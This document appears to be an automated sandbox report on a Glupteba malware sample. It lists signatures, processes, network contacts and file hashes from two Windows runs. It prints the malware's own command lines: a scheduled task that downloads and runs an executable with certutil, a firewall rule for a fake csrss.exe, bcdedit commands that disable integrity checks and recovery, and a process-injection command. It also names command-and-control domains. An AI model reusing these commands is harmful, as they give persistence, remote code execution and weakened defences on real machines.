Analysis Overview
SHA256
4dcc466c7b711acae584e6305f8b5d16f95b443cb719f00de89dfb6e5b32cf03
Threat Level: Known bad
The file 6f1f130741c10e884ac91387ba6f1671 was found to be: Known bad.
Malicious Activity Summary
Glupteba
MetaSploit
Glupteba payload
Modifies boot configuration data using bcdedit
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Program crash
Creates scheduled task(s)
GoLang User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-22 07:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-22 07:49
Reported
2024-01-22 07:52
Platform
win7-20231215-en
Max time kernel
1s
Max time network
148s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122074937.log C:\Windows\Logs\CBS\CbsPersist_20240122074937.cab
C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /124-124
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | f07d4c85-f10f-4500-992e-9c511decba96.ninhaine.com | udp |
| US | 8.8.8.8:53 | server4.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard58.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard58.blob.core.windows.net | tcp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | server4.2makestorage.com | udp |
Files
memory/2124-0-0x0000000004960000-0x0000000004D9C000-memory.dmp
memory/2124-1-0x0000000004960000-0x0000000004D9C000-memory.dmp
memory/2124-2-0x0000000004DA0000-0x00000000056C6000-memory.dmp
memory/2124-3-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2972-5-0x0000000004B60000-0x0000000004F9C000-memory.dmp
memory/2124-4-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2124-6-0x0000000004960000-0x0000000004D9C000-memory.dmp
memory/2124-7-0x0000000004DA0000-0x00000000056C6000-memory.dmp
memory/2972-8-0x0000000004B60000-0x0000000004F9C000-memory.dmp
memory/2972-9-0x0000000000400000-0x00000000030F3000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | 499eabd4f1dff82cb81cb4c3df44da76 |
| SHA1 | 2765b4730b364627585119311b0fce87ef9c6e45 |
| SHA256 | 296f916a6ac6f5e77bd15b649435d11de60fc543bfe0cba3b9c42614ddfbae67 |
| SHA512 | e4585c28abd47404917e567f8ce3a3208cc989d93b27cc600948933d1fcd29b4576e0ed8346ee14079f1abd363652164942cee14f710976461a738102beb3477 |
\Windows\rss\csrss.exe
| MD5 | 6aa89987b804232510d11688123a8c11 |
| SHA1 | d64c4e47737a23425f250b1a82ac4f5f2f8a0f27 |
| SHA256 | 00ed550c939809e40115afd5a321c932fd03650435e453aac9e0ab6c154b3aad |
| SHA512 | c67d6d106735ddf9ec7067ef35295699f113104209e5c33fdc4b51e8835ae4befca59ec98933e93020e502fea3c67eaf34e40a3452f600ee19cb98211c63ec1b |
C:\Windows\rss\csrss.exe
| MD5 | 3fe278eb70b96c11868a3134e1c4ff6f |
| SHA1 | 8d962a63dea82f8edbbf9bd361003cceb8464cba |
| SHA256 | a348f3052917186e1031aa220b3a29eca010d710f9cca8bfab3046108be4349d |
| SHA512 | 69012fd021aacc73365a205beacf88848de295a6474a7a2b4cc76c6d657838c90cb6e991bc64ee939df2337586e527a0ea30f2ab8d71f1248d01906b36143e3e |
memory/2972-17-0x0000000000400000-0x00000000030F3000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | fedef76d64a91a88ebb634be8f4db93a |
| SHA1 | 907a52726c41cd6f85cd71b7e959c41954d1e0a5 |
| SHA256 | 762bdf38f5a4db112a6fbade2705683ebec7c8ecd14877980d8a9e65d10521c6 |
| SHA512 | 22bdd544d20eb1c977089d36cc82f7acd8493a0f4dfe924a7d8759ffe8f18fa549d10c26c2fe344eef6535a8072af2c83a42bfe79971fb1f9efaad0e6b63ccf7 |
memory/2548-19-0x0000000004A40000-0x0000000004E7C000-memory.dmp
memory/2972-20-0x0000000004B60000-0x0000000004F9C000-memory.dmp
memory/2548-21-0x0000000004A40000-0x0000000004E7C000-memory.dmp
memory/2548-22-0x0000000004E80000-0x00000000057A6000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 2c27b040963e92ed4e5a0a1dc86b62f2 |
| SHA1 | 40008cb09009e199e7c2834f29243933f525914f |
| SHA256 | bebf3ef90b5afcadbceaa3f6d31ec605e887771ca0ca080610302d4fc45a4ddb |
| SHA512 | af213a4a27759419488b4fdcd6ded9b79ae17f5b97828f39c7680122554508003e132bc6e91bc9a7421127af29f313b24ceb0726ef3ac4305c953be1cbe67aca |
memory/2548-24-0x0000000000400000-0x00000000030F3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 74942d6ff7cf9cef6a929e6228c6c30b |
| SHA1 | df75f4f9be14926a7ff62c42cc016d3a7058ab7d |
| SHA256 | fda06ef0fbfa14278810a43cd9675aa09bcf6b41a500bc8dc7e8b643f4f8933b |
| SHA512 | 20e6f5a3ac3013661e21a943d367afebe7218df808d8a991facbae6246d55b8c446e089975cf6d09919f8f699bb08771d6e0777e62aae39897728c4abf39bb69 |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 4b25a3c843dd6c49f625b914b0facc65 |
| SHA1 | e518e8f8e25e0d3410954b9e04d456c46d24f54b |
| SHA256 | a4a3ee25c5644d1c406ce750991a1e8e69dc45a60936bad0f9a7c8339ef6113b |
| SHA512 | 31f1f0e94755f0486fa39c6ba6e98ef8ed4c453a0a5d5a3e60b943110aea3f189fa06674373ac25b64683c8d9f0cb7da62c6bd64e6b340e0ec436e5214e2c39c |
memory/2748-41-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | 3b9d4a06fa57529e13413f6d0cf46b63 |
| SHA1 | fa6f1391f42647cdc9658eb6d05d0b77afc660f5 |
| SHA256 | 6f17cbec30d5f10a54caa28bf51acc2a6177874a5044b4f11e2a4d1fb45105be |
| SHA512 | 48f63d24665c842e800cdc935db795b39e032105804ffa0903c6aa6d39fd8db76e4a7a70cc0644b9c3b47c3555ab037ddf88acfa2e485d86354cbb04fd181571 |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 95dbc04b5f2d043c9c7443bf470086a3 |
| SHA1 | 943883ffe35711841b401520869e53fdab395e78 |
| SHA256 | 6d0a948892711fdf81fd0c4cb8d4a0cb6ecbb2a936b31184713331bea6871ce5 |
| SHA512 | 9dee05936d7f6913319329a029c2c40a2a2fd041b586a4662c05b4653ac16745b7ebc5f8538da4df3c1b9b4011bd4aed0b6a4b17e4211dd2d93f03ebbb5dec36 |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | c0c77b59c5c75aecfbed31b0a4d5040f |
| SHA1 | 691cb3493a4cfe9dd3f58036655717b6c8da61e1 |
| SHA256 | 92342a944b20cf24028d6c24c0bbbe2b7afc3519f6bddea15575547453fe70fc |
| SHA512 | b0538141a9faac53ad2cc498d7a6dd40d636384c5db1c32cabf2ee9ebfbe3a099646f33f0f6b009918aa68400426c907de40b95689710917dcfe2c439288a704 |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 8bb42841aea78353b557b14cc8caaf2e |
| SHA1 | 83357aebec0b7eb5064df71e2adac7f849012e1d |
| SHA256 | 43a71be8749fa13e6b7e1043aa16c91434fb0b877e01dddc76a83caf3b1bd6fb |
| SHA512 | 83634b429bc741b23b368b510e0eff21da1fccc32ba7e22baf2722b6949d76de3b9cf1301c73aa391ababb075252b1688864cd9f5f9ca3a561695a34ecda6a40 |
memory/2748-55-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | d89216df6c609e1e65bc9d9fd7eaa50c |
| SHA1 | c411ef43e96321f9458b840a07f8d5368d19056b |
| SHA256 | 819baa1197c8f66f68f1c3da68a3e11e7e71c4a8624a4ddef8a3d577ea70408e |
| SHA512 | c3458057119167d1fc973ad11cf828af2239761b5bd6970b7904110aacabfdcc77eab98cc41fcbe671c910e93cb2c4007aecf4984b5edfb08cd129ab3849aac0 |
C:\Windows\Temp\Tar7929.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Windows\Temp\Cab78E7.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 51f4aa589d408c2a627caac66cb2584e |
| SHA1 | c2bf0001b7f48eec67e4813243a27bdc42e05a64 |
| SHA256 | f40e3b92dd02cd4293b7422bdd607226ea9fad2c2eb55a651d80109c273de673 |
| SHA512 | 19b12b3b8b1b6109cd38e5e79e563952e8881767a311a958fbc526dc48fa3febf2fe23b67c8b197c04cc13a6e9479cd1d2a1a6c2d88f69a88b13719a1262f708 |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a9c83c96196a21934eaed36566618795 |
| SHA1 | db7972224cb8b8b84c92aff05c42b69ea4b29ecf |
| SHA256 | 996cd2357911d3813ca5f2a8196d678478d0bb09a5aec29614d78729f85855eb |
| SHA512 | 4da6feb77c64cf6de741926e5763dd6470c55a6d3dac9e33f1272d6de01fe40b0f2f6f2aadb72fdba481245944f7fcf430fba5e1c51ffd70eebde2cd392b312a |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 643309e4f3f5942508b336c0effd1f5e |
| SHA1 | aac8c8cd90ad5df42599c07c3afdafb599f5a99f |
| SHA256 | 630c96332e449f3ed6d2c39bf0d505a5903ec8efcf837dfed74d7b82ae256144 |
| SHA512 | a5fd5cb185d0f55d94bdf5a9fb827b9718c0a547854c04e565b08492a12223a04ae675ea5890b34105df839c37b76b3895026a16770c92122525c27b3669d232 |
memory/2548-248-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-252-0x0000000004A40000-0x0000000004E7C000-memory.dmp
memory/2548-253-0x0000000000400000-0x00000000030F3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | e955c94aeb61e140041a36add84b3892 |
| SHA1 | f78eb1719a849e342091c6dc22eea460f6872ae5 |
| SHA256 | 0f7fbfa8efb1954f08b8a3caf56c72a5d3b6e7c29b70850f363d657fa318f8cf |
| SHA512 | 661f5be3c15eab627e2788d01dadb778451c7bf184484c228263f8c46791a18db59fd0bcf2fd4a893ea9720295ac549806bbd9509bc0fb930d2ebe0f237116aa |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | c05fb950baacf9ce156280ea8407c203 |
| SHA1 | 422c0d5b242dfbacd8999be8b00807089f41c1a7 |
| SHA256 | 1a648175286d173facd9645e706393d13abb53feb76b2aa17a4f68e0f683af01 |
| SHA512 | e90991e19923e242bbf0234412e58eb3f0499786382db7e2a1bbf1bf1eae7a8e558ac54939232bb07f7eb59f5e1aa74cb0705cc50487cae5bbd3df0cdb939da2 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | 02f3936dbdb185641196388ea56f8060 |
| SHA1 | b66c9fbf39b6be44e9fe9ffc8caff260ab74ee64 |
| SHA256 | 7473b90564b881e251dd89d33b31bb18008f5c51d2ddadb2a0437d111e8bbe4e |
| SHA512 | 1c00b654a85f359b168b3c88318598c47ec88e34490fe368efdbcfed6220703f7d11f3595937f807fb817eea65290ffcdd8b18d605d3d7bc6f7cb6d2a7d27335 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 5da3a881ef991e8010deed799f1a5aaf |
| SHA1 | fea1acea7ed96d7c9788783781e90a2ea48c1a53 |
| SHA256 | f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4 |
| SHA512 | 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c7b57b837e31b145d77f4d575df1b8c5 |
| SHA1 | 8fd19ae163f3d4e53b2e1459fbe98bbe43310784 |
| SHA256 | 27dde6fca4c2dba5f681cf252a57ed4e1d587f386cce783d0c98ea1fa88812e6 |
| SHA512 | 9dd507b32ce0cd549497ab52a643ba5917f72e86f9ce5b58ca5c6ed684172d8097921791790282455dad2997068604c161f1d2db158c1374bee037db638e8a0b |
memory/2548-305-0x0000000000400000-0x00000000030F3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/2548-331-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-337-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-338-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-363-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-364-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-365-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-366-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-367-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-368-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-369-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-370-0x0000000000400000-0x00000000030F3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-22 07:49
Reported
2024-01-22 07:52
Platform
win10v2004-20231222-en
Max time kernel
3s
Max time network
145s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
